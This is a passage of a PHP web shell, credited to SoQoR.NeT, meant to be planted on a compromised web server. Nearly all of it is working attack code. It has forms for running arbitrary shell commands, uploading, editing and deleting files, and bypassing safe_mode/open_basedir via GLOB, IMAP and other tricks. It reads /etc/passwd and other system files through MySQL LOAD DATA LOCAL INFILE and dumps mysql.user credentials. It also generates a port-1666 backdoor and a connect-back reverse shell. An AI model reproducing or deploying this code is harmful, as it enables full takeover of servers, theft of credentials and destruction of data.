307 } } elseif($_INPUT['do']=='bypass_dir') { $dirname = stripslashes($_POST['dirname']);
308 Echo "Listing Directory [$dirname] By ".$_POST['bug']." - <br><br>";
309 if($_POST['bug']=='GLOB') { $root=$dirname;
310 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
311 $c = 0;
312 $D = array();
313 $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
314 for($i=0;
315 $i < strlen($chars);
316 $i++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
317 $prevD = $D[count($D)-1];
318 glob($path."*");
319 if($D[count($D)-1] != $prevD){ for($j=0;
320 $j < strlen($chars);
321 $j++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
322 $prevD2 = $D[count($D)-1];
323 glob($path."*");
324 if($D[count($D)-1] != $prevD2){ for($p=0;
325 $p < strlen($chars);
326 $p++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
327 $prevD3 = $D[count($D)-1];
328 glob($path."*");
329 if($D[count($D)-1] != $prevD3){ for($r=0;
330 $r < strlen($chars);
331 $r++){ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
332 glob($path."*");
333 } } } } } } } $D = array_unique($D);
334 foreach($D as $item) echo "{$item}\n";
335 echo "</textarea>";
336 } elseif($_POST['bug']=='IMAP') { $string=$dirname;
337 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
338 $stream = imap_open("/etc/passwd", "", "");
339 if ($stream == FALSE) die("Can't open imap stream");
340 $string = explode("|",$string);
341 if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
342 else $dir_list = imap_list($stream, trim($string[0]), "*");
343 echo "<pre>";
344 for ($i = 0;
345 $i < count($dir_list);
346 $i++) echo "$dir_list[$i]"."<p>
347</p>" ;
348 echo "</pre>";
349 imap_close($stream);
350 echo "</textarea>";
351 } elseif($_POST['bug']=='OpenDir') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
352 $fp = opendir($dirname);
353 while($dir_name = readdir($fp)) { Echo $dir_name."\t\t".showperms(fileperms($dirname.$directorysperator.$dir_name))."\n";
354 } Echo "</textarea>";
355 } elseif($_POST['bug']=='Shell_Command') { echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
356 if(!$windows) { Echo command("ls -la $dirname");
357 } else { command("cd $dirname");
358 Echo command("dir");
359 } Echo "</textarea>";
360 } else { Echo "No Bug Selected";
361 } } } elseif($_INPUT['CODE']=='mysql') { if($_INPUT['do']=='readfile') { echo "Reading file Via Mysql","<br>" ;
362 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
363 Echo "Using User Name $_POST[user]\nUsing Pass $_POST[password]\nUsing DB : $_POST[dbname]\n---------------------------\nResult\n\n";
364 $file=$_POST['file'];
365 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
366 $mysql_files = explode(':', $mysql_files_str);
367 $sql = array ( "USE ".$_POST['dbname']."", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE ".$_POST['dbname']." FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM ".$_POST['dbname']." LIMIT 1" );
368 $con = mysql_connect ($_POST['host'], $_POST['user'], $_POST['password']);
369 mysql_select_DB($_POST['dbname'],$con);
370 foreach ($sql as $statement) { $q = mysql_query ($statement);
371 if ($q == false) die ( "FAILED: " . $statement . "\n" . "REASON: " . mysql_error () . "\n" );
372 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
373 echo htmlspecialchars($r[0]);
374 mysql_free_result ($q);
375 } echo "</textarea>";
376 } elseif($_INPUT['do']=='query') { echo "Executing Mysql Query","<br><br>[ ".htmlspecialchars($_POST['query'])." ]<br><br>" ;
377 echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
378 Echo "Using User Name $_POST[user]\nUsing Pass $_POST[password]\nUsing DB : $_POST[dbname]\n---------------------------\nResult\n\n";
379 $con = mysql_connect ($_POST['host'], $_POST['user'], $_POST['password']);
380 @mysql_select_DB($_POST['dbname'],$con);
381 $q = mysql_query ($_POST['query']);
382 $i=0;
383 if ($q == false) die ("FAILED: " . $_POST['query'] . "\n" ."REASON: " . mysql_error () . "\n");
384 while($r = @mysql_fetch_array ($q)) { $i++;
385 Echo "\n---------------------------\n"."Result Number [$i]:-\n---------------------------\n";
386 foreach($r as $key => $val) { if(!is_numeric($key)) { Echo "$key => ".htmlspecialchars($val)."\n";
387 } } } @mysql_free_result ($q);
388 echo "</textarea>";
389 } elseif($_INPUT['do']=="db") { $databases=array();
390 $conn=mysql_connect($_INPUT['host'],$_INPUT['user'],$_INPUT['password']) or die("Error User Name Or Password");
391 if(strlen($_INPUT['dbname'])>1) { mysql_select_db($_INPUT['dbname'],$conn) or die("Wrong Table For that user");
392 $query=mysql_list_tables($_INPUT['dbname']);
393 $tables='';
394 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'];
395 while($row=mysql_fetch_array($query)) { $tname=$row['Tables_in_'.$_INPUT['dbname']];
396 $action=$link.base64_encode("$href&table=$tname");
397 $tables=$tables."<a href=\"$action\">$tname</a><br>";
398 } $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'];
399 $amain=$link.base64_encode($href);
400 $aquery=$link.base64_encode($href."&act_do=query");
401 $adump=$link.base64_encode($href."&act_do=dump");
402 $aexit=$link.base64_encode($md5);
403 Echo "<table style=\"color:#5E5B5B;
404font-size:12px;
405font-family:Verdana;
406\" width=\"100%\">
407 <tr>
408 <td colspan=\"2\" style=\"border: 1px solid #000000;
409\" align=\"center\"><font size=\"4\"><a href=\"$amain\">Main</a> - <a href=\"$aquery\">Query</a> - <a href=\"$adump\">Dump</a> - <a href=\"$aexit\">Exit</a></font></td>
410 </tr>
411 <tr>
412 <td width=\"25%\" style=\"border: 1px solid #000000;
413\" valign=\"top\">";
414 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'];
415 $back=$link.base64_encode($href);
416 Echo "<a href=\"$back\" style=\"color:red\">-[ Select Another Database ]-</a><br><hr>";
417 Echo $tables;
418 Echo "</td>
419 <td width=\"75%\" style=\"border: 1px solid #000000;
420\" valign=\"top\"><h3>Controling Table ".$_INPUT['table']."</h3>
421<br>";
422 if(strlen($_INPUT['table'])>1) { $fields=array();
423 $query = mysql_query("SHOW FIELDS FROM `".$_INPUT['table']."`");
424 while($row=mysql_fetch_array($query)) { $frows[$row['Field']]=$row;
425 $fields[]=$row['Field'];
426 if($row['Extra']=="auto_increment") { $skey=$row['Field'];
427 } } if($_INPUT['t_act']=="delete") { if(empty($_INPUT['t_act_do'])) { $kkey=$_INPUT['key'];
428 $edit_query=mysql_query("select * FROM `".$_INPUT['table']."` where ".$kkey.'=\''.$_INPUT[$kkey].'\'');
429 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
430 $action=$link.base64_encode("$href&t_act=delete&t_act_do=delete&key=".$_INPUT['key']."&".$_INPUT['key']."=".$_INPUT[$kkey]."");
431 Echo "<form name=edit action='$action' method='post'>
432 <input type=hidden name='t_act_do' value='delete'>";
433 Echo "<table style=\"color:#000000;
434font-size:12px;
435font-family:Verdana;
436\" width=\"100%\">
437 <tr>
438 <td colspan=\"2\" style=\"border: 1px solid #000000;
439\" align=\"center\">Deleting Row</td>
440 </tr> <tr>
441 <td colspan=\"2\" style=\"border: 1px solid #000000;
442\" align=\"center\">Are You Sre You want Delete the row where is $kkey = ".$_INPUT[$kkey]."</td>
443 </tr>";
444 Echo "<tr align='center'><td colspan=2 style=\"border: 1px solid #000000;
445\"><input type='submit' value='- - Delete - -'> -- -- -- <input type='reset' value='- - Back - -' onclick='window.location=javascript:history.back()'></td></tr>";
446 Echo "</table></form>";
447 } else { $kkey=$_INPUT['key'];
448 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
449 $ed_ag=$link.base64_encode("$href&t_act=delete&key=".$_INPUT['key']."&".$_INPUT['key']."=".$_INPUT[$kkey]."");
450 $bk_tb=$link.base64_encode("$href");
451 $comma='';
452 $sets='';
453 $update_q=mysql_query("delete from `".$_INPUT['table']."` where ".$kkey.'=\''.$_INPUT[$kkey].'\'');
454 if(!$update_q) { Echo "<h3>Problem And Was Not Deleted ..</h3><br><Br><a href='$ed_ag'>Delete Again</a> - <a href='$bk_tb'>Back to table</a>";
455 } else { Echo "<h3>Deleted ..</h3><br><Br><a href='$bk_tb'>Back to table</a>";
456 } } } elseif($_INPUT['t_act']=="edit") { if(empty($_INPUT['t_act_do'])) { $kkey=$_INPUT['key'];
457 $edit_query=mysql_query("select * FROM `".$_INPUT['table']."` where ".$kkey.'=\''.$_INPUT[$kkey].'\'');
458 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
459 $action=$link.base64_encode("$href&t_act=edit&t_act_do=edit&key=".$_INPUT['key']."&".$_INPUT['key']."=$_INPUT[$kkey]");
460 Echo "<form name=edit action='$action' method='post'>
461 <input type=hidden name='t_act_do' value='edit'>";
462 Echo "<table style=\"color:#5E5B5B;
463font-size:12px;
464font-family:Verdana;
465\" width=\"100%\">
466 <tr>
467 <td colspan=\"2\" style=\"border: 1px solid #000000;
468\" align=\"center\">Editing Row</td>
469 </tr>";
470 while($row=mysql_fetch_array($edit_query)) { foreach($fields as $key => $val) { Echo "<tr><td style=\"border: 1px solid #000000;
471\">";
472 Echo "$val</td><td style=\"border: 1px solid #000000;
473\">";
474 if(eregi("text",$frows[$val]['Type'])) { Echo "<textarea name='".$val."' rows='5' cols='50'>".htmlspecialchars($row[$val])."</textarea>";
475 } elseif(eregi("enum",$frows[$val]['Type'])) { Echo "<input type='text' name='".$val."' value='".htmlspecialchars($row[$val])."' size='50'>";
476 } else { Echo "<input type='text' name='".$val."' value='".htmlspecialchars($row[$val])."' size='50'>";
477 } Echo "</td></tr>";
478 } } Echo "<tr align='center'><td colspan=2 style=\"border: 1px solid #000000;
479\"><input type='submit' value='- - Edit - -'> -- -- -- <input type='reset' value='- - Reset - -'></td></tr>";
480 Echo "</table></form>";
481 } else { $kkey=$_INPUT['key'];
482 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
483 $ed_ag=$link.base64_encode("$href&t_act=edit&key=".$_INPUT['key']."&".$_INPUT['key']."=$_INPUT[$kkey]");
484 $bk_tb=$link.base64_encode("$href");
485 $comma='';
486 $sets='';
487 foreach($fields as $key => $val) { $sets.=$comma.'`'.$val.'`=\''.$_INPUT[$val].'\'';
488 $comma=',';
489 } $update_q=mysql_query("UPDATE `".$_INPUT['table']."` set $sets where ".$kkey.'=\''.$_INPUT[$kkey].'\'');
490 if(!$update_q) { Echo "<h3>Problem And Was Not Edited ..</h3><br><Br><a href='$ed_ag'>Edit Again</a> - <a href='$bk_tb'>Back to table</a>";
491 } else { Echo "<h3>Edited ..</h3><br><Br><a href='$ed_ag'>Edit Again</a> - <a href='$bk_tb'>Back to table</a>";
492 } } } else { echo "<table style=\"border: 1px solid #000000;
493color:#000000;
494font-size:12px;
495font-family:Verdana;
496\"><tr>";
497 Echo "<td style=\"border: 1px solid #000000;
498\">Delete</td>";
499 Echo "<td style=\"border: 1px solid #000000;
500\">Edit</td>";
501 foreach($fields as $key => $val) { Echo "<td style=\"border: 1px solid #000000;
502\">
503$val</td>";
504 } echo "</tr>";
505 $num_query=mysql_query("select * from `".$_INPUT['table']."`");
506 $sql_page=($_INPUT['sql_page'])?$_INPUT['sql_page']:1;
507 $start=($sql_page * 40)-40;
508 $limit=$start.',40';
509 $query=mysql_query("select * from `".$_INPUT['table']."` limit $limit");
510 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
511 while($row=mysql_fetch_array($query)) { echo "<tr>";
512 $dellink=$link.base64_encode("$href&t_act=delete&key=$skey&$skey=$row[$skey]");
513;
514 $editlink=$link.base64_encode("$href&t_act=edit&key=$skey&$skey=$row[$skey]");
515;
516 Echo "<td style=\"border: 1px solid #000000;
517\"><a href='$dellink'>Delete</a></td>";
518 Echo "<td style=\"border: 1px solid #000000;
519\"><a href='$editlink'>Edit</a></td>";
520 foreach($fields as $key => $val) { Echo "<td style=\"border: 1px solid #000000;
521\">
522".htmlspecialchars($row[$val])."</td>";
523 } echo "</tr>";
524 } Echo "</table>";
525 $pages=mysql_num_rows($num_query);
526 $page_nums=ceil($pages/40);
527 for($i=0;
528$i<$page_nums;
529$i++) { $ii=$i+1;
530 $hlink=$link.base64_encode("$href&sql_page=$ii");
531 Echo "<a href='$hlink'>$ii</a>||";
532 } } } else { Echo "<h1>Controling Database ".$_INPUT['dbname']." </h1><font size=4>Select Table To Control The Table Rows</font><br>";
533 Echo $tables;
534 } Echo "</td></tr></table>";
535 } else { Echo "<h3>Select Database To Control</h3>";
536 $query=mysql_list_dbs($conn);
537 while($row=mysql_fetch_array($query)) { $databases[]=$row['Database'];
538 } $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'];
539 foreach($databases as $key => $val) { $ahref=$href.'&dbname='.$val;
540 $action=$link.base64_encode($ahref);
541 echo("<a href=\"$action\">$val</a><br>");
542 } } } else { Echo "<h2>Sql Manager</h2>";
543 $href=$md5."CODE=mysql&do=db&path=".GETCWD();
544 $action=$link.base64_encode($href);
545 Echo "<form name=\"sql-connect\" action=\"$action\" method=\"post\">
546<table border=\"0\" id=\"contentpage\">
547<tr>
548<td>DB User</td>
549<td>DB Pass</td>
550<td>Db Name</td>
551</tr>
552<tr>
553<td><input type=\"text\" name=\"user\" value=\"root\"></td>
554<td><input type=\"text\" name=\"password\" value=\"\"></td>
555<td><input type=\"text\" name=\"dbname\" value=\"test\"></td>
556</tr>
557<tr>
558<td>DB Host</td>
559<td>
560</td>
561</tr>
562<tr>
563<td><input type=\"text\" name=\"host\" value=\"localhost\"></td>
564<td><input type=submit value=\"Connect\"></td>
565</tr>
566</table></form>";
567 Echo "</center>";
568 } } Echo '</td></tr></table> ';
569 Echo "<br><table align=center style=\"background:#F4F4F4;
570color:#6E6E6E;
571width: 95%;
572border: 1px solid #6E6E6E;
573margin: auto auto;
574font-size:12px;
575font-weight:bold;
576\">";
577 $action=$links[1];
578 Echo '<tr><td colspan="2">';
579 Echo '<center><form name="command" action="'.$action.'" method="post">Execute Comamnds To the Server : ';
580 Echo '<input type=text name="cdm" size="50">'."\n<input type=submit value=\" - - - Go - - - \"></form> </center></td></tr><tr>";
581 Echo '<tr><td colspan="2">';
582 Echo '<center><form name="command" action="'.$action.'" method="post">Execute Specific Commands : ';
583 Echo '<select name="cdm">'.$commandsselects.'</select>'."\n<input type=submit value=\" - - - Go - - - \"></form> </center></td></tr><tr></table>";
584 Echo "<br>\n<table align='center' border='1' bordercolor='#111111' style=\"background:#F4F4F4;
585color:#6E6E6E;
586border-collapse: collapse;
587width: 95%;
588margin: auto auto;
589font-size:12px;
590font-weight:bold;
591\">";
592 Echo '<tr style="background-color:black;
593color:#FFFFFF"><td colspan="2"><center>Uplad / Make - Files/Dirs</center></td></tr>';
594 Echo "<tr><td>";
595 $href=$md5."CODE=file&do=create&path=".GETCWD();
596 $action=$link.base64_encode($href);
597 Echo '<center><form name="make" action="'.$action.'" method="post">Make File : <input type="text" name="file" value='.$dir.$directorysperator.'>'."\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
598 Echo '</td>';
599 Echo '<td>';
600 $href=$md5."CODE=dir&do=up&path=".GETCWD();
601 $action=$link.base64_encode($href);
602 Echo '<center><form name="upload" action="'.$action.'" enctype="multipart/form-data" method="post">Upload File : <input type="file" name="file">'."\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
603 Echo '</td>';
604 Echo '</tr>';
605 Echo '<tr><td>';
606 $href=$md5."CODE=dir&do=crdir&path=".GETCWD();
607 $action=$link.base64_encode($href);
608 Echo '<center><form name="create" action="'.$action.'" method="post">Make Dir : <input type="text" name="dirname" value='.$dir.$directorysperator.'>'."\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
609 Echo '</td>';
610 Echo '<td>';
611 $href=$md5."CODE=dir&do=godir&path=".GETCWD();
612 $action=$link.base64_encode($href);
613 Echo '<center><form name="go" action="'.$action.'" method="post">Go To Dir : <input type="text" name="dirname" value='.$dir.$directorysperator.'>'."\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
614 Echo '</td>';
615 Echo '</tr>';
616 Echo '<tr style="background-color:black;
617color:#FFFFFF"><td colspan="2"><center>Safe Mode / Open_Basedir - ByPass</center></td></tr>';
618 $bugs="";
619 $arrays=array('Tempname','CURL','Copy','Ini_Restore','IMAP','ReadFile','File_Get_Contents','Shell_Command','Id Only /etc/passwd');
620 foreach($arrays as $key => $val) { $bugs.="<option value='$val'>$val</option>";
621 } Echo '<tr><td>';
622 $href=$md5."CODE=bypass&do=bypass_file&path=".GETCWD();
623 $action=$link.base64_encode($href);
624 Echo '<center><form name="create" action="'.$action.'" method="post">Read File : <input type="text" name="filename" value='.$dir.$directorysperator.'>';
625 Echo "<select name=\"bug\">$bugs</select>";
626 Echo "\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
627 Echo '</td>';
628 $bugs="";
629 $arrays=array('GLOB','IMAP','OpenDir','Shell_Command');
630 foreach($arrays as $key => $val) { $bugs.="<option value='$val'>$val</option>";
631 } Echo '<td>';
632 $href=$md5."CODE=bypass&do=bypass_dir&path=".GETCWD();
633 $action=$link.base64_encode($href);
634 Echo '<center><form name="go" action="'.$action.'" method="post">List Dir : <input type="text" name="dirname" value='.$dir.$directorysperator.'>';
635 Echo "<select name=\"bug\">$bugs</select>";
636 Echo "\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
637 Echo '</td>';
638 Echo '</tr>';
639 $href=$md5."CODE=mysql&do=readfile&path=".GETCWD();
640 $action=$link.base64_encode($href);
641 Echo '<tr style="background-color:black;
642color:#FFFFFF"><td colspan="2"><center>Mysql Staff</center></td></tr>';
643 Echo '<tr><td colspan=2>';
644 Echo "\n<table align='center' border='0' bordercolor='#111111' style=\"background:#F4F4F4;
645color:#6E6E6E;
646border-collapse: collapse;
647width: 95%;
648margin: auto auto;
649font-size:12px;
650font-weight:bold;
651\"><tr><td>";
652 Echo '<center>';
653 Echo '<form name="mysql" action="'.$action.'" method="post">
654DBHost : <input name="host" type="text" value="localhost">
655<br>DBUser : <input name="user" type="text" value="root">
656<br>DBPass : <input name="password" type="text" value="root">
657<br>DBName : <input name="dbname" type="text" value="test">
658<br>Filename : <input name="file" type="text" value="/etc/passwd">
659<br><input type=submit value="Get File Contents"></form>';
660 Echo "</center>";
661 Echo '</td>';
662 $href=$md5."CODE=mysql&do=query&path=".GETCWD();
663 $action=$link.base64_encode($href);
664 Echo '<td>';
665 Echo '<center>';
666 Echo '<form name="mysql" action="'.$action.'" method="post">
667DBHost : <input name="host" type="text" value="localhost">
668<br>DBUser : <input name="user" type="text" value="root">
669<br>DBPass : <input name="password" type="text" value="root">
670<br>DBName : <input name="dbname" type="text" value="test">
671<br>Query : <input name="query" type="text" value="select * from mysql.user">
672<br><input type=submit value="Execute Query"></form>';
673 Echo "</center>";
674 Echo '</td>';
675 $href=$md5."CODE=mysql&do=db&path=".GETCWD();
676 $action=$link.base64_encode($href);
677 Echo '<td>';
678 Echo '<center>';
679 Echo '<form name="mysql" action="'.$action.'" method="post">
680DBHost : <input name="host" type="text" value="localhost">
681<br>DBUser : <input name="user" type="text" value="root">
682<br>DBPass : <input name="password" type="text" value="root">
683<br>DBName : <input name="dbname" type="text" value="test"><br><input type=submit value="Connect"></form>';
684 Echo "</center>";
685 Echo '</td>';
686 Echo '</tr></table>';
687 Echo '</td>';
688 Echo '</tr>';
689 $action=$links[2];
690 Echo '<tr style="background-color:black;
691color:#FFFFFF"><td colspan="2"><center>BackDoor - BackConnecttion</center></td></tr>';
692 Echo '<tr><td>';
693 Echo '<center>';
694 Echo '<form name="back" action="'.$action.'" method="post"><input type="hidden" name="backdoored" value="1">Port : <input ReadOnly type="text" value="1666"><br><br><input type=submit value="Generate Backdoor"></form>';
695 Echo'</center>';
696 Echo '</td>';
697 $action=$links[3];
698 Echo '<td>';
699 Echo '<center>';
700 Echo "<form name=\"backcon\" action=\"$action\" method=\"post\">\n<input type=\"hidden\" name=\"backdoored\" value=\"1\">
701Ip : \n<input type=\"text\" name=\"i\" value=\"".getip()."\">
702<br> Port : <input type=\"text\" name=\"p\" value=\"22290\"><br><br><input type=submit value=\"Connect-Back\"></form>";
703 Echo "</center>";
704 Echo '</td>';
705 Echo '</tr>';
706 Echo '</table>';
707 Echo "<br>\n<table align=center style=\"background:#F4F4F4;
708color:#6E6E6E;
709width: 95%;
710border: 1px solid #6E6E6E;
711margin: auto auto;
712font-size:12px;
713font-weight:bold;
714\">";
715 Echo '
716 <tr>
717 <td align="center">
718 Copyright ©
719 Is reserved to : <a href="mailto:security@soqor.net">HACKERS PAL</a>
720 <br>
721 SqShell By <a href="http://www.soqor.net">SoQoR.NeT</a> Team
722 </td>
723 </tr>';
724 Echo '</table>';
725 Echo "\n</body>\n</html>";
726 function size($value) { if($value >= (1024*1000*1000*1000)) { $size=($value/(1024*1000*1000*1000));
727 $ex = ' TB';
728 }elseif($value >= (1024*1000*1000)) { $size=($value/(1024*1000*1000));
729 $ex = ' GB';
730 }elseif($value >= (1024*1000)) { $size=($value/(1024*1000));
731 $ex=' MB';
732 }elseif($value >= 1024) { $size=($value/1024);
733 $ex=' KB';
734 }else { $size=$value;
735 $ex = ' Byte';
736 } return @round($size,2).$ex;
737 } function command($cmda) { $return = '';
738 if (!empty($cmda)) { if(function_exists('exec')) { @exec($cmda,$return);
739 $return = join("\n",$return);
740 } elseif(function_exists('shell_exec')) { $return = @shell_exec($cmda);
741 } elseif(function_exists('system')) { @ob_start();
742 @system($cmda);
743 $return = @ob_get_contents();
744 @ob_end_clean();
745 } elseif(function_exists('passthru')) { @ob_start();
746 @passthru($cmda);
747 $return = @ob_get_contents();
748 @ob_end_clean();
749 } elseif(@is_resource($f = @popen($cmda,'r'))) { $return = '';
750 while(!@feof($f)) { $return .= @fread($f,1024);
751 } @pclose($f);
752 } } return $return;
753 } function random($num) { $letters=array('a', 'b', 'c', 'd','e','f','g','h','i','j','k','l','m','n','o','p','q','r', 's','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K', 'L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z');
754 $i=0;
755 while($i<$num) { $ret.=$letters[rand(1,52)];
756 $i++;
757 } return $ret;
758 } function printfile($fileinfo) { GLOBAL $link,$directorysperator,$md5;
759 $perhref=$md5.'CODE=perms&'.'path='.GETCWD().$directorysperator.$fileinfo['name'];
760 if($fileinfo['size'] == 'dir') { $href=$md5.'CODE=dir&'.'path='.GETCWD().$directorysperator.$fileinfo['name'];
761 $fileinfo['name']='['.$fileinfo['name'].']';
762 } else { $href=$md5.'CODE=file&'.'path='.GETCWD().$directorysperator.$fileinfo['name'];
763 $fileinfo['actions']='<a href="___1___">[DOWN]</a>-<a href="___2___">[Edit]</a>-<a href="___3___">[Del]</a>';
764 } $herf1=$link.base64_encode("$href&do=down");
765 $href2=$link.base64_encode("$href&do=edit");
766 $href3=$link.base64_encode("$href&do=del");
767 $fileinfo['actions']=str_replace('___1___',$herf1,$fileinfo['actions']);
768 $fileinfo['actions']=str_replace('___2___',$href2,$fileinfo['actions']);
769 $fileinfo['actions']=str_replace('___3___',$href3,$fileinfo['actions']);
770 $href=$link.base64_encode($href);
771 $perhref=$link.base64_encode($perhref);
772 if($fileinfo['modify'] == 'Yes') { $pcolor='green';
773 }elseif($fileinfo['read'] == 'Yes') { $pcolor='#000000';
774 } else { $pcolor='red';
775 } $fileinfo['read'] = '<font color="'.$pcolor.'">'.$fileinfo['read'].'</font>';
776 $fileinfo['modify'] = '<font color="'.$pcolor.'">'.$fileinfo['modify'].'</font>';
777 $fileinfo['permissions'] = '<font color="'.$pcolor.'">'.$fileinfo['permissions'].'</font>';
778 if(!$fileinfo['actions']) { $fileinfo['actions']="Directory";
779 } return '<tr><td width="30%"><a href="'.$href.'">'.$fileinfo['name'].'</a></td>
780 <td>'.$fileinfo['size'].'</td>
781 <td>'.$fileinfo['read'].'</td>
782 <td>'.$fileinfo['modify'].'</td>
783 <td>'.$fileinfo['owner'].'</td>
784 <td><a href="'.$perhref.'">'.$fileinfo['permissions'].'</a></td>
785 <td>'.$fileinfo['actions'].'</td></tr>';
786 } function getperms($file) { $perms = @fileperms($file);
787 $info = showperms($perms);
788 return $info;
789 } function showperms($perms) { if (($perms & 0xC000) == 0xC000) { $info = 's';
790 } elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
791 } elseif (($perms & 0x8000) == 0x8000) { $info = '-';
792 } elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
793 } elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
794 } elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
795 } elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
796 } else { $info = 'u';
797 } $info .= (($perms & 0x0100) ? 'r' : '-');
798 $info .= (($perms & 0x0080) ? 'w' : '-');
799 $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
800 $info .= (($perms & 0x0020) ? 'r' : '-');
801 $info .= (($perms & 0x0010) ? 'w' : '-');
802 $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
803 $info .= (($perms & 0x0004) ? 'r' : '-');
804 $info .= (($perms & 0x0002) ? 'w' : '-');
805 $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
806 return $info;
807 } function shownumperms($perms) { $info='';
808 $permissions='';
809 $info .= (($perms & 0x0100) ? 'r' : '-');
810 $info .= (($perms & 0x0080) ? 'w' : '-');
811 $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
812 $permissions.=showpermsnum($info);
813 $info='';
814 $info .= (($perms & 0x0020) ? 'r' : '-');
815 $info .= (($perms & 0x0010) ? 'w' : '-');
816 $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
817 $permissions.=showpermsnum($info);
818 $info='';
819 $info .= (($perms & 0x0004) ? 'r' : '-');
820 $info .= (($perms & 0x0002) ? 'w' : '-');
821 $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
822 $permissions.=showpermsnum($info);
823 return $permissions;
824 } function showpermsnum($perms) { $arrayper=array('---','--x','-w-','-wx','r--','r-x','rw-','rwx');
825 foreach($arrayper as $key => $val) { if($val == $perms) { return $key;
826 } } } function owner($file) { if(function_exists('fileowner')) { $fileowneruid=@fileowner($file);
827 } if(function_exists('posix_getpwuid')) { $fileownerarray=@posix_getpwuid($fileowneruid);
828 } $fileowner=($fileownerarray['name'])?$fileownerarray['name']:$fileowneruid;
829 if(function_exists('filegroup')) { $fileg=@filegroup($file);
830 } if(function_exists('posix_getgrgid')) { $groupinfo = @posix_getgrgid($fileg);
831 } $filegg=($groupinfo['name'])?$groupinfo['name']:$fileg;
832 return "$fileowner/$filegg";
833 } function getip() { global $_SERVER;
834 if (isset($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP'];
835 } else if($_SERVER['HTTP_X_FORWARDED_FOR']) { if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $ips)) { while(list($key, $val) = each($ips[0])) { if(!preg_match("#^(10|172\.16|192\.168)\.#", $val)) { $ip = $val;
836 break;
837 } } } } else if (isset($_SERVER['REMOTE_ADDR'])) { $ip = $_SERVER['REMOTE_ADDR'];
838 } return $ip;
839 }
840?>